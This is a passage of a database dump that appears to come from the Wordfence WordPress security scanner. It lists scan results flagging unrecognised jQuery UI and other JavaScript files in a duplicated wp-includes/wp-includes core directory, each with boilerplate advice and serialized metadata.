href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-shake.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77716,1675048846,1675048846,'new','knownfile',75,'ead7e2d3e2f099d5dff63ac33f8adbba','f576ee98e1dbe56fada9c645ee9459b8','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-size.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-size.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77717,1675048846,1675048846,'new','knownfile',75,'b4b2a73070f49984e887923fa1288c65','27e1a423be544209d3a185c85a43cc05','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-size.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-size.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77718,1675048846,1675048846,'new','knownfile',75,'2c0ec6776b1c46eda86fd92e2dde0e01','e3e93d34ab7ca0fc64133c5817f8f638','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-slide.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-slide.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77719,1675048846,1675048846,'new','knownfile',75,'59541d2e552a655a1c13217ecfafe6e6','7760c1a7057094063ae2623804c11e0b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-slide.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-slide.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77720,1675048846,1675048846,'new','knownfile',75,'d17ec3b3feb307f36b13116fa740334f','8634ad0b57685a4efa16e9d5fccace51','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-transfer.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-transfer.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77721,1675048846,1675048846,'new','knownfile',75,'0a3461e10774bea0860f69a812b47bad','b32c85b6a675574fc9090cbc136e44fb','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-transfer.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/jquery/ui/effect-transfer.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77722,1675048846,1675048846,'new','knownfile',75,'3f8f2f536c3f4c138a26088ec7e3abee','4295577415455eecbf56a21ffa0c5403','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/effect.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77723,1675048847,1675048847,'new','knownfile',75,'f2dba2820ef254b26e051b0216fdcbd3','dfdbedac49227d2c5b6e40dbea3bbaea','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/effect.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77724,1675048847,1675048847,'new','knownfile',75,'d8b6e14d89ecd89629cc1d7c32d6de19','68c86b91a54c1ca9d80bbe72e562133a','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/menu.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/ui/menu.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77725,1675048847,1675048847,'new','knownfile',75,'38b7e14fa4d3902b65cddfb31867e909','f5f8d2041e07ed70dc79911dd666a065','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/menu.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/menu.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77726,1675048847,1675048847,'new','knownfile',75,'52b83048255af01bcfae1842d6812307','51bf87dc2ff80446572376ffdd9cd2ba','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/mouse.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/jquery/ui/mouse.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77727,1675048847,1675048847,'new','knownfile',75,'641642165826b4418bc10cff9b0419fe','4cdffbf9e33b2f0091a476ce5e95f71b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/mouse.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/mouse.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77728,1675048847,1675048847,'new','knownfile',75,'f4374507b78202be304a6063ed15999c','f5d2f6fc010607c91cd063e2780431c5','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/progressbar.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/progressbar.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77729,1675048847,1675048847,'new','knownfile',75,'407b678326de712fa4b02f19383d29bf','8b1874ef91202ff2e9c90501517f3d35','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/progressbar.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/progressbar.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77730,1675048847,1675048847,'new','knownfile',75,'cb28ed4171910e910be5ad74b8bc8037','200658f5ca557769d64e940f305eaa24','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/resizable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/resizable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77731,1675048847,1675048847,'new','knownfile',75,'8d30499da6725868ec5df6949f7b8729','0bdfd894b657364ccf03481371ec1295','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/resizable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/resizable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77732,1675048847,1675048847,'new','knownfile',75,'48aab31ffb48f6c1667292071da00476','c4cd85a530f47dfddd8f1e69e4843a23','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/selectable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77733,1675048847,1675048847,'new','knownfile',75,'28a42e3b5f278c068c1927a22bd87b9d','7d1cc87262a4ef5b01b9e5b470873e4e','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/selectable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77734,1675048847,1675048847,'new','knownfile',75,'505e8f6c02bca1710801ad88a4f9cceb','1c397eb375d1cf44272d27ed1dab56a6','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectmenu.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/selectmenu.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77735,1675048847,1675048847,'new','knownfile',75,'c0f88752630287842cf2fee1857ba8f8','2356f1fa723c03999ec05b9a0808d6fe','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectmenu.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/selectmenu.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77736,1675048847,1675048847,'new','knownfile',75,'6205b855f24b42abb06e5fe546290654','9e1b8353982cedd2f89111f89d33c35f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/slider.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/slider.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77737,1675048848,1675048848,'new','knownfile',75,'78b58d5d273aba9d010168faf594eee9','084c8e49c86f28581c955cfb81945df4','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/slider.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/slider.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77738,1675048848,1675048848,'new','knownfile',75,'08687c95cd90dbc7092be84da526d700','88f3e12e0e3704e73eca326b346d41c8','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/sortable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/sortable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77739,1675048848,1675048848,'new','knownfile',75,'e80a35311e295fcbaad37c10484a4e46','0af01c6bcaaeb7666c71a8d06ff83483','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/sortable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/sortable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77740,1675048848,1675048848,'new','knownfile',75,'b9d798081425c03498eb7c46360d9275','22698cc531b1fb667c8525e7cb9150fa','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/spinner.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/jquery/ui/spinner.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77741,1675048848,1675048848,'new','knownfile',75,'f5f040bea0307feda7250c2bed096c79','54ae213bf1131214b4204c570c3496eb','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/spinner.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/spinner.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77742,1675048848,1675048848,'new','knownfile',75,'725c53b589a27db6b6ae9471866fd388','8135c650ecc17c3eb5fe9ee1e2b36d84','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tabs.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/ui/tabs.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77743,1675048848,1675048848,'new','knownfile',75,'af0fb60c362580d25bfd5972816bfa58','85b14e4757b78422d08063ee502581cd','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tabs.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/tabs.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77744,1675048848,1675048848,'new','knownfile',75,'c9a3ef6ff6604cdcc241c040b2a90f94','c80cc88dd738eab53897f0a9c2deeb81','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tooltip.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/jquery/ui/tooltip.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77745,1675048848,1675048848,'new','knownfile',75,'9ef6cbaf917a4a38742cce1bcf61cf6b','7dd5a460a7af799f7b193da7702d1962','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tooltip.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/tooltip.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77746,1675048848,1675048848,'new','knownfile',75,'42efe3f9b29789eaa6da310f705fe62a','4d498491d8598d06ac8020c7475fadfc','Unknown file in WordPress core: wp-includes/wp-includes/js/json2.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/js/json2.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77747,1675048848,1675048848,'new','knownfile',75,'056fa86d583a8d41e20f54d1d9b95543','4e35bd04609c01e0ae64934111bd8cb0','Unknown file in WordPress core: wp-includes/wp-includes/js/json2.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/json2.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77748,1675048848,1675048848,'new','knownfile',75,'986c2780a21993a7edf61f050f6bfff1','d47eb171895f8b5332e930e944177a78','Unknown file in WordPress core: wp-includes/wp-includes/js/masonry.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/masonry.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77749,1675048848,1675048848,'new','knownfile',75,'f26b4f89130b2efc4f7d8525693713d7','1d6818c3cef3e440fa489028d2e49d83','Unknown file in WordPress core: wp-includes/wp-includes/js/mce-view.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/mce-view.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77750,1675048848,1675048848,'new','knownfile',75,'7247338de3f63b2b41b56894914659ea','06a0b72c65242503cc1c1e5e9adffb57','Unknown file in WordPress core: wp-includes/wp-includes/js/mce-view.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/mce-view.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77751,1675048848,1675048848,'new','knownfile',75,'67636eb2c44f019d7a44a9cd36051fc6','74394987136308a558fa341db3b84c07','Unknown file in WordPress core: wp-includes/wp-includes/js/media-audiovideo.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/media-audiovideo.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77752,1675048848,1675048848,'new','knownfile',75,'cb0c93023f447255c5b55a8b0ad0af1d','4f5bf5c9df6e6b01f54a396b9d68d068','Unknown file in WordPress core: wp-includes/wp-includes/js/media-audiovideo.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 